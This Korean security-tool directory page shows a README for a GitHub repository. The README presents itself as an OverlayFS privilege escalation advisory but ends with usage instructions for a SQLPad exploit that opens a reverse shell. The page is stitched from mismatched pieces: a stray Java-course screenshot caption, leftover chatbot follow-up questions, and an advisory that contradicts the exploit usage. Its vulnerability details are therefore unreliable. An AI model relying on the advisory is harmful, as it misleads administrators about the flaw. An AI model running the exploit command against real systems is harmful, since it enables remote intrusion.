Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
OverlayFS-PrivEsc-CVE-2022-0944 | Kitploit
도구/GitHubGitHub/neoartemis37/overlayfs-privesc-cve-2022-0944
Privilege EscalationVulnerability AnalysisExploitationLearning & Education
GitHubneoartemis37/overlayfs-privesc-cve-2022-0944

OverlayFS-PrivEsc-CVE-2022-0944

저장소 보기

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
3개월 전아직 검토되지 않음

CVE-2022-0944: OverlayFS 권한 상승 취약점 🛡️

CVE Severity

OverlayFS의 Linux 커널 권한 상승 취약점에 대한 보안 권고 및 완화 가이드입니다.

개요

CVE-2022-0944는 Linux 커널의 OverlayFS 하위 시스템에서 특정 구성의 파일 생성 처리가 부적절하여 로컬 공격자가 권한을 상승시킬 수 있는 보안 취약점입니다.

기술 세부 정보

Screenshot 2025-03-26 at 17-15-46 i got published a course for java for beginners unfortunally i don't have a redame file to guide through

🚨 영향

로컬 공격자는 다음을 수행할 수 있습니다:

root@kitploit:~
조작된 파일 작업을 통해 루트 권한 획득
보안 제한 우회
중요한 시스템 파일 수정
시스템 전체 무결성 손상

🔍 탐지

  1. 커널 버전 확인 uname -r

영향을 받는 버전: 5.8 <= kernel < 5.16.12

  1. OverlayFS 사용 확인 mount | grep overlay

OverlayFS 마운트를 사용하는 시스템은 위험합니다

  1. 보안 권고 확인

Debian/Ubuntu의 경우:

root@kitploit:~
grep CVE-2022-0944 /var/log/apt/history.log

# RHEL/CentOS의 경우:
rpm -q --changelog kernel | grep CVE-2022-0944

4.🛡️ 완화 조치

공식 패치

다음 패치 적용 버전 중 하나로 업데이트하십시오:

root@kitploit:~
Linux 커널 5.16.12 이상
벤더별 백포트 패치

업데이트 명령:

Ubuntu/Debian

sudo apt update && sudo apt upgrade linux-image-$(uname -r)

RHEL/CentOS

sudo yum update kernel

임시 완화 조치(즉시 패치가 불가능한 경우)

root@kitploit:~
OverlayFS 사용 제한:
  sudo modprobe -r overlay

네임스페이스 제한 구현:
# 권한 없는 사용자 네임스페이스 생성 unshare -Ur

root@kitploit:~
    # 사용자 제한과 함께 마운트
    mount -t overlay -o lowerdir=/lower,upperdir=/upper,workdir=/work overlay /mnt

SELinux/AppArmor 정책 적용: type=AVC msg=audit(1647452829.123:456): user pid=1234 comm="mount" scontext=user_u:user_r:user_t tcontext=system_u:object_r:unlabeled_t denied { mounton }

⚠️ 면책 조항 본 문서는 정보 제공 목적으로만 제공됩니다. 정확성을 보장하기 위해 노력했지만, 어떠한 보증도 제공되지 않습니다. 프로덕션 환경에 배포하기 전에 항상 개발 환경에서 패치를 테스트하십시오.

마지막 업데이트: 2023-10-01 | 변경 로그 보기

주요 기능:

  1. 보안 배지를 통한 명확한 취약점 분류
  2. 빠른 참조가 가능한 기술 세부 정보 표
  3. 실행 가능한 탐지 및 완화 단계
  4. 벤더별 업데이트 명령
  5. 보안 정책 예시(SELinux/AppArmor)
  6. 공식 참조 링크
  7. 취약점 공개 표준 준수

이 README 형식은 다음에 적합합니다:

  • 보안 팀
  • 시스템 관리자
  • DevOps 엔지니어
  • 오픈소스 유지관리자
  • 취약점 데이터베이스

다음을 수행할까요:

  1. 특정 벤더 패치 정보를 추가할까요?
  2. 익스플로잇 개념 증명(PoC) 세부 정보를 포함할까요? (주의 필요)
  3. 탐지 스크립트를 더 추가할까요?
  4. 특정 Linux 배포판에 맞게 사용자 지정할까요?

사용법

root@kitploit:~
usage: main.py [-h] url lhost lport [username] [password]

positional arguments:
  url         URL to SQLPad
  lhost       Listener host address for reverse shell
  lport       Listener port for reverse shell
  username    login username (optional)
  password    login password (optional)

options:
  -h, --help  show this help message and exit

예시:

root@kitploit:~
# install requirements
pip install -r requirements.txt

# start sqlpad docker container
docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:6.10.0

# trigger exploit
./main.py http://localhost:3000 127.0.0.1 1337 admin admin

면책 조항

이 저장소에 포함된 코드와 도구는 교육 목적, 특히 사이버 보안 강좌 및 학습 환경에서의 사용을 위해서만 제공됩니다. 이 코드의 작성자는 본 코드의 사용, 오용 또는 수정으로 인해 발생하는 모든 결과에 대해 책임을 지지 않습니다. 본 코드는 특정 목적에 대한 상품성 또는 적합성에 대한 묵시적 보증을 포함하되 이에 국한되지 않는, 명시적 또는 묵시적 어떠한 보증도 없이 "있는 그대로" 제공됩니다.

도구 다운로드